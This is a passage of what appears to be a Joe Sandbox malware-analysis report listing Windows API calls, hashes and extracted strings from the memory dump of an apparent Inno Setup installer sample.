                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                            • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                            • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                            • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                            • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                            • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                                            • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                                            • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                            • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                                            • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                                            • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                            • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                            • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                                            • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                                            • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                            • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                            • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                                            • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                            • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                                            • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                                            • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                            • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                            • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                            • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                            • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                              • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                            • API String ID: 1968650500-2910565190
                                                                                            • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                            • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                                            • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                                            • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00457D4F
                                                                                            • QueryPerformanceCounter.KERNEL32(02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D58
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02193858,02193858), ref: 00457D62
                                                                                            • GetCurrentProcessId.KERNEL32(?,02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D6B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02193858,02193858), ref: 00457DEF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                                            • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                            • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                                            • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                                            • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                                            APIs
                                                                                              • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                              • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                              • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                              • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                              • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                              • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02192BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                                            • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                                            • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                            • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                                            • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                                            • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
